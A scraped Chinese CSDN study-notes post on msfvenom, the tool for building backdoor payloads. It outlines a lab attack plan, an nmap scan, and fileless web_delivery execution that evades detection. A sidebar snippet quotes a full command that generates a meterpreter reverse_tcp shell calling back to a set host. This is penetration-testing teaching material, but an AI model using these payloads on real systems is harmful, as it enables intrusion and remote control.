msfvenom笔记

最新推荐文章于 2024-05-09 09:12:51 发布
最新推荐文章于 2024-05-09 09:12:51 发布
阅读量141 收藏
点赞数 1
文章标签: 笔记 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc777777777/article/details/130533653
版权

msfvenom (生成木马的)

msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。

进一步解释
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

攻击实例

target: 192.168.123.129
attack: 192.168.123.128
方法一:通过web站点,使用无文件的方式攻击利用执行
方法二:通过web站点,上传webshell,返回给msf
方法三:攻击其他端口服务,拿到meterpreter

第一步:nmap端口信息收集

nmap -sV -T4 192.168.123.129
在这里插入图片描述在这里插入图片描述

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场。
web_delivery的主要目的是快速和受害者主机建立一条session。当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以使用web_delivery生成的一条命令建立连接。
另外web_delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。
web_delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target o或1或2来设置是使用php还是python还是powershell等。

在这里插入图片描述
在这里插入图片描述

不能不通
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
java超强笔记
12-03
java超强笔记。涵盖java详细信息,适合初学者阅读,从安装到软件设计,涉及全面,阅读方便。
远控免杀学习笔记-msfvenom工具介绍(一)
m0_49025459的博客
04-04 337
msfvenom是msfpayload和msfencode的结合体,于2015年6⽉8⽇取代了msfpayload和msfencode。在此之后,metasploit-framework下⾯的的 msfpayload(荷载⽣成器),msfencoder(编码器),msfcli(监听接⼝)都不再被⽀持。
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1543
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
msfvenom简介
gRpc的博客
09-22 188
msfvenom
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 873
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
msfvenom学习笔记
zr1213159840的博客
06-26 2255
来源于啊B的这个视频的学习笔记,但是讲的很乱 msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenommsfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elfmsfvenom -p windows/meterprete
Msfvenom 学习笔记与总结
weixin_30477293的博客
03-01 204
平台:Android,可用Payload: 1 android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP 2 android/meterpreter/reverse_https ...
Metasploit笔记
浅笑996的博客
10-21 311
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 0x01 基本操作 1、运行 Shell中直接输入msfconsole 2、建立搜索缓存(数据库) 启动PostgreSQL数据库服务 :...
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 612
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
华为学习笔记
03-28
华为学习笔记
C++学习笔记
05-14
C++学习笔记C++学习笔记C++学习笔记C++学习笔记C++学习笔记
笔记笔记笔记笔记笔记笔记
02-08
笔记
javaweb笔记
02-28
Java笔记,对java知识有着高度的总结,可以让您在javaweb学习的路上少走众多弯路,奋斗吧,皮卡丘!
java学习笔记13
hanq2016的博客
05-04 624
java学习笔记,持续更新,非常完整,Math, Random
第 8 章 机器人平台设计之底盘实现(自学二刷笔记)
最新发布
Galaxy_1229的博客
05-09 403
ros_arduino_bridge
STM32CubeMX学习笔记30---FreeRTOS内存管理
H2z1220的博客
05-06 857
FreeRTOS 操作系统将内核与内存管理分开实现,操作系统内核仅规定了必要的内存管理函数原型,而不关心这些内存管理函数是如何实现的,所以在 FreeRTOS 中提供了多种内存分配算法(分配策略),但是上层接口(API)却是统一的。这样做可以增加系统的灵活性:用户可以选择对自己更有利的内存管理策略,在不同的应用场合使用不同的内存分配策略。
英语学习笔记8——What‘s your job?
AllenAC的博客
05-09 467
police男警察police女警察police n. 警力西方国家警察管的事很多。交警,刑警,武警一般不分开。taxi driver 出租车司机taxi / cab n. 出租车driver n. 司机taxi driver = 出租车 + 司机 = 出租车司机air hostess 空中服务员构成:air n. 空气hostess n. 女主人air hostess = 空气中的女主人 = 空姐 = 空中服务员postman n. 邮递员。
设计模式学习笔记 - 回顾总结:如何将设计思想、原则、模式等理论知识应用到项目中?
chenjian723122704的专栏
05-07 953
我们第整个专栏的理论知识点做了串讲,不知道你掌握的如何?对于上节课总结的重点内容,希望你能多花点时间搞透彻,对于一些不那么重要的内容,你可以把它们当做资料,用到的时候随手查询,再深入学习。实际上,虽然理论掌握得差不多,专栏也很贴近实战,每个知识点的讲解都有结合实际的代码案例,并且最后还有集中的项目实战,但落实到自己写代码时,可能还是无法将学习到的理论知识很好的应用。本章,就再聊一聊如何将设计思想、原则、模式等理论知识应用到实际的项目开发中。
vscode 笔记
09-10
对于VSCode作为一个轻量级的代码编辑器,它确实可以用作笔记本来记录和管理你的笔记。VSCode提供了一些有用的功能,使其成为一个很好的笔记工具: 1. 编辑器功能:VSCode具有强大的代码编辑功能,包括语法高亮、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值